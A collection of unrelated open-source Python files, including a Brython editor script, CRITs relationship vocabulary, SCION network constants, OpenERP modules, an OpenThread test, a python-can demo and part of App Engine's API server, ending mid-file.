plt.plot(x_values, body_reg.predict(x_values))
plt.show()
|
morphean/deep-learning
|
linear-regression/linear-regression.py
|
Python
|
apache-2.0
| 380 | 0.005263 |
import sys
import time
import traceback
import javascript
from browser import document as doc, window, alert
has_ace = True
try:
editor = window.ace.edit("editor")
session = editor.getSession()
session.setMode("ace/mode/python")
editor.setOptions({
'enableLiveAutocompletion': True,
'enableSnippets': True,
'highlightActiveLine': False,
'highlightSelectedWord': True,
'autoScrollEditorIntoView': True,
# 'maxLines': session.getLength() 可以根據程式長度設定 editor 列數
'maxLines': 20
})
except:
from browser import html
editor = html.TEXTAREA(rows=20, cols=70)
doc["editor"] <= editor
def get_value(): return editor.value
def set_value(x):editor.value = x
editor.getValue = get_value
editor.setValue = set_value
has_ace = False
if hasattr(window, 'localStorage'):
from browser.local_storage import storage
else:
storage = None
def reset_src():
if storage is not None and "py_src" in storage:
editor.setValue(storage["py_src"])
else:
editor.setValue('for i in range(10):\n\tprint(i)')
editor.scrollToRow(0)
editor.gotoLine(0)
def reset_src_area():
if storage and "py_src" in storage:
editor.value = storage["py_src"]
else:
editor.value = 'for i in range(10):\n\tprint(i)'
class cOutput:
def __init__(self,target):
self.target = doc[target]
def write(self,data):
self.target.value += str(data)
#if "console" in doc:
sys.stdout = cOutput("console")
sys.stderr = cOutput("console")
def to_str(xx):
return str(xx)
info = sys.implementation.version
doc['version'].text = 'Brython %s.%s.%s' % (info.major, info.minor, info.micro)
output = ''
def show_console(ev):
doc["console"].value = output
doc["console"].cols = 60
doc["console"].rows = 10
# load a Python script
def load_script(evt):
_name = evt.target.value + '?foo=%s' % time.time()
editor.setValue(open(_name).read())
# run a script, in global namespace if in_globals is True
def run(*args):
global output
doc["console"].value = ''
src = editor.getValue()
if storage is not None:
storage["py_src"] = src
t0 = time.perf_counter()
try:
#ns = {'__name__':'__main__'}
ns = {'__name__':'editor'}
exec(src, ns)
state = 1
except Exception as exc:
traceback.print_exc(file=sys.stderr)
state = 0
output = doc["console"].value
print('<completed in %6.2f ms>' % ((time.perf_counter() - t0) * 1000.0))
return state
if has_ace:
reset_src()
else:
reset_src_area()
def clear_console(ev):
doc["console"].value = ""
doc['run'].bind('click',run)
doc['show_console'].bind('click',show_console)
doc['clear_console'].bind('click',clear_console)
|
kmolab/kmolab.github.io
|
data/py/script1.py
|
Python
|
agpl-3.0
| 2,826 | 0.008922 |
from crits.vocabulary.vocab import vocab
class RelationshipTypes(vocab):
"""
Vocabulary for Relationship Types.
"""
COMPRESSED_FROM = "Compressed From"
COMPRESSED_INTO = "Compressed Into"
CONNECTED_FROM = "Connected From"
CONNECTED_TO = "Connected To"
CONTAINS = "Contains"
CONTAINED_WITHIN = "Contained Within"
CREATED = "Created"
CREATED_BY = "Created By"
DECODED = "Decoded"
DECODED_BY = "Decoded By"
DECRYPTED = "Decrypted"
DECRYPTED_BY = "Decrypted By"
DOWNLOADED = "Downloaded"
DOWNLOADED_BY = "Downloaded By"
DOWNLOADED_FROM = "Downloaded From"
DOWNLOADED_TO = "Downloaded To"
DROPPED = "Dropped"
DROPPED_BY = "Dropped By"
INSTALLED = "Installed"
INSTALLED_BY = "Installed By"
LOADED_FROM = "Loaded From"
LOADED_INTO = "Loaded Into"
PACKED_FROM = "Packed From"
PACKED_INTO = "Packed Into"
RECEIVED_FROM = "Received From"
SENT_TO = "Sent To"
REGISTERED = "Registered"
REGISTERED_TO = "Registered To"
RELATED_TO = "Related To"
RESOLVED_TO = "Resolved To"
SENT = "Sent"
SENT_BY = "Sent By"
SUB_DOMAIN_OF = "Sub-domain Of"
SUPRA_DOMAIN_OF = "Supra-domain Of"
@classmethod
def inverse(cls, relationship=None):
"""
Return the inverse relationship of the provided relationship.
:param relationship: The relationship to get the inverse of.
:type relationship: str
:returns: str or None
"""
if relationship is None:
return None
if relationship == cls.COMPRESSED_FROM:
return cls.COMPRESSED_INTO
elif relationship == cls.COMPRESSED_INTO:
return cls.COMPRESSED_FROM
elif relationship == cls.CONNECTED_FROM:
return cls.CONNECTED_TO
elif relationship == cls.CONNECTED_TO:
return cls.CONNECTED_FROM
elif relationship == cls.CONTAINS:
return cls.CONTAINED_WITHIN
elif relationship == cls.CONTAINED_WITHIN:
return cls.CONTAINS
elif relationship == cls.CREATED:
return cls.CREATED_BY
elif relationship == cls.CREATED_BY:
return cls.CREATED
elif relationship == cls.DECODED:
return cls.DECODED_BY
elif relationship == cls.DECODED_BY:
return cls.DECODED
elif relationship == cls.DECRYPTED:
return cls.DECRYPTED_BY
elif relationship == cls.DECRYPTED_BY:
return cls.DECRYPTED
elif relationship == cls.DOWNLOADED:
return cls.DOWNLOADED_BY
elif relationship == cls.DOWNLOADED_BY:
return cls.DOWNLOADED
elif relationship == cls.DOWNLOADED_FROM:
return cls.DOWNLOADED_TO
elif relationship == cls.DOWNLOADED_TO:
return cls.DOWNLOADED_FROM
elif relationship == cls.DROPPED:
return cls.DROPPED_BY
elif relationship == cls.DROPPED_BY:
return cls.DROPPED
elif relationship == cls.INSTALLED:
return cls.INSTALLED_BY
elif relationship == cls.INSTALLED_BY:
return cls.INSTALLED
elif relationship == cls.LOADED_FROM:
return cls.LOADED_INTO
elif relationship == cls.LOADED_INTO:
return cls.LOADED_FROM
elif relationship == cls.PACKED_FROM:
return cls.PACKED_INTO
elif relationship == cls.PACKED_INTO:
return cls.PACKED_FROM
elif relationship == cls.RECEIVED_FROM:
return cls.SENT_TO
elif relationship == cls.SENT_TO:
return cls.RECEIVED_FROM
elif relationship == cls.REGISTERED:
return cls.REGISTERED_TO
elif relationship == cls.REGISTERED_TO:
return cls.REGISTERED
elif relationship == cls.RELATED_TO:
return cls.RELATED_TO
elif relationship == cls.RESOLVED_TO:
return cls.RESOLVED_TO
elif relationship == cls.SENT:
return cls.SENT_BY
elif relationship == cls.SENT_BY:
return cls.SENT
elif relationship == cls.SUB_DOMAIN_OF:
return cls.SUPRA_DOMAIN_OF
elif relationship == cls.SUPRA_DOMAIN_OF:
return cls.SUB_DOMAIN_OF
else:
return None
|
ckane/crits
|
crits/vocabulary/relationships.py
|
Python
|
mit
| 4,362 | 0.000688 |
from .Base_Action import *
class ProfileAction(Base_Action):
def __init__(self, action_xml, root_action=None):
super(self.__class__, self).__init__(action_xml, root_action)
self.shouldUseLaunchSchemeArgsEnv = self.contents.get('shouldUseLaunchSchemeArgsEnv');
self.savedToolIdentifier = self.contents.get('savedToolIdentifier');
self.useCustomWorkingDirectory = self.contents.get('useCustomWorkingDirectory');
self.buildConfiguration = self.contents.get('buildConfiguration');
self.debugDocumentVersioning = self.contents.get('debugDocumentVersioning');
|
samdmarshall/pyxcscheme
|
pyxcscheme/ProfileAction.py
|
Python
|
bsd-3-clause
| 611 | 0.018003 |
# Copyright 2015 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`defines` --- Constants
============================
Contains constant definitions used throughout the codebase.
"""
# Stdlib
import os
#: SCION protocol version
SCION_PROTO_VERSION = 0
#: Max TTL of a PathSegment in realtime seconds.
# TODO(shitz): This value should be externally configurable. The problem is that
# the revocation hash tree TTL needs to be at least as large as MAX_SEGMENT_TTL,
# but having a TTL of 1 day makes the hash tree generation costly enough that it
# times out on CircleCI. Thus, we should have one external config file for the
# Docker/CircleCI environment and one for production.
MAX_SEGMENT_TTL = 30 * 60
#: Time unit for HOF expiration.
EXP_TIME_UNIT = MAX_SEGMENT_TTL // 256
#: Max number of supported HopByHop extensions (does not include SCMP)
MAX_HOPBYHOP_EXT = 3
#: Number of bytes per 'line'. Used for padding in many places.
LINE_LEN = 8
#: Generated files directory
GEN_PATH = 'gen'
#: Topology configuration
TOPO_FILE = "topology.yml"
#: AS configuration
AS_CONF_FILE = "as.yml"
#: Path policy config
PATH_POLICY_FILE = "path_policy.yml"
#: Networks config
NETWORKS_FILE = "networks.conf"
#: IFIDs list
IFIDS_FILE = "ifids.yml"
#: AS list
AS_LIST_FILE = "as_list.yml"
#: Buffer size for receiving packets
SCION_BUFLEN = 65535
#: Default SCION endhost data port
SCION_UDP_EH_DATA_PORT = 30041
#: Default SCION filter command port
SCION_FILTER_CMD_PORT = 30042
#: Default DNS UDP/TCP port
SCION_DNS_PORT = 30053
#: Default SCION router UDP port.
SCION_ROUTER_PORT = 50000
#: Default SCION dispatcher host addr
SCION_DISPATCHER_ADDR = "/run/shm/dispatcher.sock"
#: Default SCION dispatcher port
SCION_DISPATCHER_PORT = 3334
#: Default SCION dispatcher UNIX socket directory
DISPATCHER_DIR = "/run/shm/dispatcher"
#: Default SCION dispatcher ID
DEFAULT_DISPATCHER_ID = "default"
BEACON_SERVICE = "bs"
CERTIFICATE_SERVICE = "cs"
DNS_SERVICE = "ds"
PATH_SERVICE = "ps"
ROUTER_SERVICE = "br"
SIBRA_SERVICE = "sb"
#: All the service types
SERVICE_TYPES = (
BEACON_SERVICE,
CERTIFICATE_SERVICE,
DNS_SERVICE,
PATH_SERVICE,
ROUTER_SERVICE,
SIBRA_SERVICE,
)
#: Dispatcher registration timeout
DISPATCHER_TIMEOUT = 60
#: How often IFID packet is sent to neighboring router.
IFID_PKT_TOUT = 1
#: Default MTU - assumes overlay is ipv4+udp
DEFAULT_MTU = 1500 - 20 - 8
#: IPv6 min value
SCION_MIN_MTU = 1280
#: Length of opaque fields
OPAQUE_FIELD_LEN = 8
#: How long certain warnings should be suppresed after startup
STARTUP_QUIET_PERIOD = 30
#: Number of seconds per sibra tick
SIBRA_TICK = 4
#: How far in the future a steady path can reserve at a time.
SIBRA_MAX_STEADY_TICKS = 45
#: How far in the future an ephemeral path can reserve at a time.
SIBRA_MAX_EPHEMERAL_TICKS = 4
#: Length of steady path ID in bytes
SIBRA_STEADY_ID_LEN = 8
#: Length of ephemeral path ID in bytes
SIBRA_EPHEMERAL_ID_LEN = 16
#: SIBRA Bandwidth multiplier
SIBRA_BW_FACTOR = 16 * 1024
#: SIBRA max reservation index
SIBRA_MAX_IDX = 16
PATH_FLAG_SIBRA = "SIBRA"
MAX_HOST_ADDR_LEN = 16
# Time per Epoch
HASHTREE_EPOCH_TIME = 10
# The tolerable error in epoch in seconds.
HASHTREE_EPOCH_TOLERANCE = 5
# Max time to live
HASHTREE_TTL = MAX_SEGMENT_TTL
# Number of epochs in one TTL per interface
HASHTREE_N_EPOCHS = HASHTREE_TTL // HASHTREE_EPOCH_TIME
# How much time in advance to compute the next hash tree
HASHTREE_UPDATE_WINDOW = HASHTREE_TTL // 3
# TCP polling timeouts, used by accept() and recv().
TCP_ACCEPT_POLLING_TOUT = 1
# SCION control-plane TCP connection timeout.
TCP_TIMEOUT = 5
|
caterinaurban/Typpete
|
typpete/tests/scion_err/lib/defines.py
|
Python
|
mpl-2.0
| 4,117 | 0.000729 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys
import openerp.netsvc as netsvc
import openerp.osv as base
import openerp.pooler as pooler
from openerp.tools.safe_eval import safe_eval as eval
class Env(dict):
def __init__(self, cr, uid, model, ids):
self.cr = cr
self.uid = uid
self.model = model
self.ids = ids
self.obj = pooler.get_pool(cr.dbname).get(model)
self.columns = self.obj._columns.keys() + self.obj._inherit_fields.keys()
def __getitem__(self, key):
if (key in self.columns) or (key in dir(self.obj)):
res = self.obj.browse(self.cr, self.uid, self.ids[0])
return res[key]
else:
return super(Env, self).__getitem__(key)
def _eval_expr(cr, ident, workitem, action):
ret=False
assert action, 'You used a NULL action in a workflow, use dummy node instead.'
for line in action.split('\n'):
line = line.strip()
uid=ident[0]
model=ident[1]
ids=[ident[2]]
if line =='True':
ret=True
elif line =='False':
ret=False
else:
env = Env(cr, uid, model, ids)
ret = eval(line, env, nocopy=True)
return ret
def execute_action(cr, ident, workitem, activity):
obj = pooler.get_pool(cr.dbname).get('ir.actions.server')
ctx = {'active_model':ident[1], 'active_id':ident[2], 'active_ids':[ident[2]]}
result = obj.run(cr, ident[0], [activity['action_id']], ctx)
return result
def execute(cr, ident, workitem, activity):
return _eval_expr(cr, ident, workitem, activity['action'])
def check(cr, workitem, ident, transition, signal):
if transition['signal'] and signal != transition['signal']:
return False
uid = ident[0]
if transition['group_id'] and uid != 1:
pool = pooler.get_pool(cr.dbname)
user_groups = pool.get('res.users').read(cr, uid, [uid], ['groups_id'])[0]['groups_id']
if not transition['group_id'] in user_groups:
return False
return _eval_expr(cr, ident, workitem, transition['condition'])
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
BorgERP/borg-erp-6of3
|
server/openerp/workflow/wkf_expr.py
|
Python
|
agpl-3.0
| 3,130 | 0.007348 |
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import node
LEADER = 1
ROUTER = 2
ED1 = 3
SED1 = 4
class Cert_5_6_1_NetworkDataLeaderAsBr(unittest.TestCase):
def setUp(self):
self.nodes = {}
for i in range(1,5):
self.nodes[i] = node.Node(i)
self.nodes[LEADER].set_panid(0xface)
self.nodes[LEADER].set_mode('rsdn')
self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[LEADER].enable_whitelist()
self.nodes[ROUTER].set_panid(0xface)
self.nodes[ROUTER].set_mode('rsdn')
self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ROUTER].add_whitelist(self.nodes[ED1].get_addr64())
self.nodes[ROUTER].add_whitelist(self.nodes[SED1].get_addr64())
self.nodes[ROUTER].enable_whitelist()
self.nodes[ROUTER].set_router_selection_jitter(1)
self.nodes[ED1].set_panid(0xface)
self.nodes[ED1].set_mode('rsn')
self.nodes[ED1].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[ED1].enable_whitelist()
self.nodes[SED1].set_panid(0xface)
self.nodes[SED1].set_mode('s')
self.nodes[SED1].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[SED1].enable_whitelist()
self.nodes[SED1].set_timeout(3)
def tearDown(self):
for node in list(self.nodes.values()):
node.stop()
del self.nodes
def test(self):
self.nodes[LEADER].start()
self.nodes[LEADER].set_state('leader')
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[LEADER].add_prefix('2001:2:0:1::/64', 'paros')
self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro')
self.nodes[LEADER].register_netdata()
self.nodes[ROUTER].start()
time.sleep(5)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[ED1].start()
time.sleep(5)
self.assertEqual(self.nodes[ED1].get_state(), 'child')
self.nodes[SED1].start()
time.sleep(5)
self.assertEqual(self.nodes[SED1].get_state(), 'child')
addrs = self.nodes[ED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
addrs = self.nodes[SED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
if __name__ == '__main__':
unittest.main()
|
JakubBrachTieto/openthread
|
tests/scripts/thread-cert/Cert_5_6_01_NetworkDataRegisterBeforeAttachLeader.py
|
Python
|
bsd-3-clause
| 4,513 | 0.000665 |
"""
This demo creates multiple processes of Producers to spam a socketcan bus.
"""
import time
import logging
import concurrent.futures
import can
can.rc['interface'] = 'socketcan_native'
from can.interfaces.interface import Bus
can_interface = 'vcan0'
def producer(id):
""":param id: Spam the bus with messages including the data id."""
bus = Bus(can_interface)
for i in range(16):
msg = can.Message(arbitration_id=0x0cf02200, data=[id, i, 0, 1, 3, 1, 4, 1])
bus.send(msg)
# TODO Issue #3: Need to keep running to ensure the writing threads stay alive. ?
time.sleep(2)
if __name__ == "__main__":
#logging.getLogger('').setLevel(logging.DEBUG)
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
executor.map(producer, range(5))
time.sleep(2)
|
BateauNautilus/DriveSimulator
|
lib/pythoncan/examples/virtual_can_demo.py
|
Python
|
mit
| 822 | 0.006083 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2017 Didotech SRL
import logging
from openerp.osv import fields, orm
import tools
from openerp import addons
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
class res_users(orm.Model):
_inherit = "res.users"
def _get_photo(self, cr, uid, context=None):
photo_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
return open(photo_path, 'rb').read().encode('base64')
def _get_image(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = tools.image_get_resized_images(obj.image)
return result
def _set_image(self, cr, uid, id, name, value, args, context=None):
return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context)
def _has_image(self, cr, uid, ids, name, args, context=None):
result = {}
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = obj.image or False
return result
def _get_default_image(self, cr, uid, context=None):
image_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
return tools.image_resize_image_big(open(image_path, 'rb').read().encode('base64'))
_columns = {
'image': fields.binary("Image",
help="This field holds the image used as avatar for this contact, limited to 1024x1024px"),
'image_medium': fields.function(_get_image, fnct_inv=_set_image,
string="Medium-sized image", type="binary", multi="_get_image",
store={
'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Medium-sized image of this contact. It is automatically "\
"resized as a 128x128px image, with aspect ratio preserved. "\
"Use this field in form views or some kanban views."),
'image_small': fields.function(_get_image, fnct_inv=_set_image,
string="Small-sized image", type="binary", multi="_get_image",
store={
'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Small-sized image of this contact. It is automatically "\
"resized as a 64x64px image, with aspect ratio preserved. "\
"Use this field anywhere a small image is required."),
'has_image': fields.function(_has_image, type="boolean"),
}
_defaults = {
'image': lambda self, cr, uid, ctx={}: self._get_default_image(cr, uid, ctx),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
iw3hxn/LibrERP
|
res_users_kanban/models/inherit_res_users.py
|
Python
|
agpl-3.0
| 2,957 | 0.005749 |
"""."""
def get_systeminfo(resource, config, interactive=False):
"""."""
return {'ohai': 'there!'}
|
lil-cain/satori
|
satori/sysinfo/ohai.py
|
Python
|
apache-2.0
| 109 | 0 |
from abc import ABCMeta, abstractmethod
class Parent(object):
__metaclass__ = ABCMeta
@abstractmethod
def my_method2(self):
pass
@abstractmethod
def my_method(self, foo):
pass
|
akosyakov/intellij-community
|
python/testData/refactoring/pullup/abstractMethodHasMeta/SuperClass.after.py
|
Python
|
apache-2.0
| 215 | 0.004651 |
import os, sys
from functools import partial
if 'DJANGO_SETTINGS_MODULE' not in os.environ:
sys.path.append('.')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.conf import settings
from django.test.client import Client
from django.test.utils import setup_test_environment, teardown_test_environment
from django.core.management import call_command
from django.core import mail
from django.contrib.auth.models import User
def pytest_funcarg__django_client(request):
'''py.test funcargs are awesome. This ugly function basically creates a
test environment with an empty database every time you write a test
function that accepts an argument named 'django_client.' Most of the time
you won't use this, you'll use the 'client' funcarg below instead. This
funcarg is only reset once per test session. The 'client' funcarg empties
the database after each test to ensure a clean slate.'''
try:
old_name = settings.DATABASES['default']['NAME']
except AttributeError:
# try older settings format
old_name = settings.DATABASE_NAME
def setup():
setup_test_environment()
if not hasattr(settings, 'DEBUG'):
settings.DEBUG = False
if 'south' in settings.INSTALLED_APPS:
from south.management.commands import patch_for_test_db_setup
patch_for_test_db_setup()
from django.db import connection
connection.creation.create_test_db(1, True)
return Client()
def teardown(client):
teardown_test_environment()
from django.db import connection
connection.creation.destroy_test_db(old_name, 1)
return request.cached_setup(setup, teardown, "session")
def pytest_funcarg__client(request):
'''Creates a test environment using the 'django_client' funcarg above, but
also ensures the database is flushed after running each test.'''
def setup():
return request.getfuncargvalue('django_client')
def teardown(client):
call_command('flush', verbosity=0, interactive=False)
mail.outbox = []
return request.cached_setup(setup, teardown, "function")
def user_creator(name, email, **extra):
'''Creates a user.'''
# Note: I make test usernames and passwords identical for easy login
user = User.objects.create_user(username=name,
password=name,
email=email)
for attr, value in extra.iteritems():
setattr(user, attr, value)
user.save()
return user
def pytest_funcarg__user(request):
'''Create a user with no special permissions.'''
return request.cached_setup(partial(user_creator,
"user",
"user@example.com"),
lambda user: user.delete(),
"session")
def pytest_funcarg__admin(request):
'''Create an admin user with all permissions.'''
return request.cached_setup(partial(user_creator,
"admin",
"admin@example.com",
is_superuser=True,
is_staff=True),
lambda user: user.delete(),
"session")
|
0101/django-pytest
|
django_pytest/conftest.py
|
Python
|
bsd-3-clause
| 3,390 | 0.00236 |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Serves the stub App Engine APIs (e.g. memcache, datastore) over HTTP.
The Remote API protocol is used for communication.
"""
from __future__ import with_statement
import BaseHTTPServer
import httplib
import logging
import os.path
import pickle
import socket
import SocketServer
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import urllib2
import urlparse
import wsgiref.headers
import google
import yaml
from google.appengine.api import mail_stub
from google.appengine.api import request_info
from google.appengine.api import urlfetch_stub
from google.appengine.api import user_service_stub
from google.appengine.api.app_identity import app_identity_stub
from google.appengine.api.blobstore import blobstore_stub
from google.appengine.api.blobstore import file_blob_storage
from google.appengine.api.capabilities import capability_stub
from google.appengine.api.channel import channel_service_stub
from google.appengine.api.files import file_service_stub
from google.appengine.api.logservice import logservice_stub
from google.appengine.api.search import simple_search_stub
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.api.prospective_search import prospective_search_stub
from google.appengine.api.memcache import memcache_stub
from google.appengine.api.system import system_stub
from google.appengine.api.xmpp import xmpp_service_stub
from google.appengine.api import datastore_file_stub
from google.appengine.datastore import datastore_sqlite_stub
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.ext.remote_api import remote_api_pb
from google.appengine.ext.remote_api import remote_api_services
from google.appengine.runtime import apiproxy_errors
QUIT_PATH = '/quit'
GLOBAL_API_LOCK = threading.RLock()
class Error(Exception):
pass
def _ClearDatastoreStorage(datastore_path):
"""Delete the datastore storage file at the given path."""
if os.path.lexists(datastore_path):
try:
os.remove(datastore_path)
except OSError, e:
logging.warning('Failed to remove datastore file %r: %s',
datastore_path,
e)
def _ClearProspectiveSearchStorage(prospective_search_path):
"""Delete the perspective search storage file at the given path."""
if os.path.lexists(prospective_search_path):
try:
os.remove(prospective_search_path)
except OSError, e:
logging.warning('Failed to remove prospective search file %r: %s',
prospective_search_path,
e)
THREAD_SAFE_SERVICES = frozenset((
'app_identity_service',
'capability_service',
'channel',
'logservice',
'mail',
'memcache',
'remote_socket',
'urlfetch',
'user',
'xmpp',
))
def _ExecuteRequest(request):
"""Executes an API method call and returns the response object.
Args:
request: A remote_api.Request object representing the API call e.g. a call
to memcache.Get.
Returns:
A ProtocolBuffer.ProtocolMessage representing the API response e.g. a
memcache_service_pb.MemcacheGetResponse.
Raises:
apiproxy_errors.CallNotFoundError: if the requested method doesn't exist.
apiproxy_errors.ApplicationError: if the API method calls fails.
"""
service = request.service_name()
method = request.method()
service_methods = remote_api_services.SERVICE_PB_MAP.get(service, {})
request_class, response_class = service_methods.get(method, (None, None))
if not request_class:
raise apiproxy_errors.CallNotFoundError('%s.%s does not exist' % (service,
method))
request_data = request_class()
request_data.ParseFromString(request.request())
response_data = response_class()
def MakeRequest():
apiproxy_stub_map.MakeSyncCall(service, method, request_data,
response_data)
if service in THREAD_SAFE_SERVICES:
MakeRequest()
else:
with GLOBAL_API_LOCK:
MakeRequest()
return response_data
class APIRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handler for all API server HTTP requests."""
def log_message(self, format, *args):
logging.debug(format, *args)
def do_GET(self):
if self.path == QUIT_PATH:
self._HandleShutdown()
else:
params = urlparse.parse_qs(urlparse.urlparse(self.path).query)
rtok = params.get('rtok', ['0'])[0]
self.send_response(httplib.OK)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(yaml.dump({
'app_id': self.server.app_id,
'rtok': rtok,
}))
def _HandleShutdown(self):
"""Handles a request for the API Server to exit."""
self.send_response(httplib.OK)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write('API Server Quitting')
self.server.shutdown()
def do_POST(self):
"""Handles a single API request e.g. memcache.Get()."""
self.send_response(httplib.OK)
self.send_header('Content-Type', 'application/octet-stream')
self.end_headers()
response = remote_api_pb.Response()
try:
request = remote_api_pb.Request()
request.ParseFromString(
self.rfile.read(int(self.headers['content-length'])))
api_response = _ExecuteRequest(request).Encode()
response.set_response(api_response)
except Exception, e:
logging.debug('Exception while handling %s\n%s',
request,
traceback.format_exc())
response.set_exception(pickle.dumps(e))
if isinstance(e, apiproxy_errors.ApplicationError):
application_error = response.mutable_application_error()
application_error.set_code(e.application_error)
application_error.set_detail(e.error_detail)
self.wfile.write(response.Encode())
class APIServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Serves API calls over HTTP."""
def __init__(self, server_address, app_id):
BaseHTTPServer.HTTPServer.__init__(self, server_address, APIRequestHandler)
self.app_id = app_id
def _SetupStubs(
app_id,
application_root,
appidentity_email_address,
appidentity_private_key_path,
trusted,
blobstore_path,
use_sqlite,
auto_id_policy,
high_replication,
datastore_path,
datastore_require_indexes,
images_host_prefix,
logs_path,
mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
mail_enable_sendmail,
mail_show_mail_body,
mail_allow_tls,
matcher_prospective_search_path,
taskqueue_auto_run_tasks,
taskqueue_task_retry_seconds,
taskqueue_default_http_server,
user_login_url,
user_logout_url,
default_gcs_bucket_name):
"""Configures the APIs hosted by this server.
Args:
app_id: The str application id e.g. "guestbook".
application_root: The path to the directory containing the user's
application e.g. "/home/bquinlan/myapp".
trusted: A bool indicating if privileged APIs should be made available.
blobstore_path: The path to the file that should be used for blobstore
storage.
use_sqlite: A bool indicating whether DatastoreSqliteStub or
DatastoreFileStub should be used.
auto_id_policy: One of datastore_stub_util.SEQUENTIAL or .SCATTERED,
indicating whether the Datastore stub should assign IDs sequentially
or scattered.
high_replication: A bool indicating whether to use the high replication
consistency model.
datastore_path: The path to the file that should be used for datastore
storage.
datastore_require_indexes: A bool indicating if the same production
datastore indexes requirements should be enforced i.e. if True then
a google.appengine.ext.db.NeedIndexError will be be raised if a query
is executed without the required indexes.
images_host_prefix: The URL prefix (protocol://host:port) to preprend to
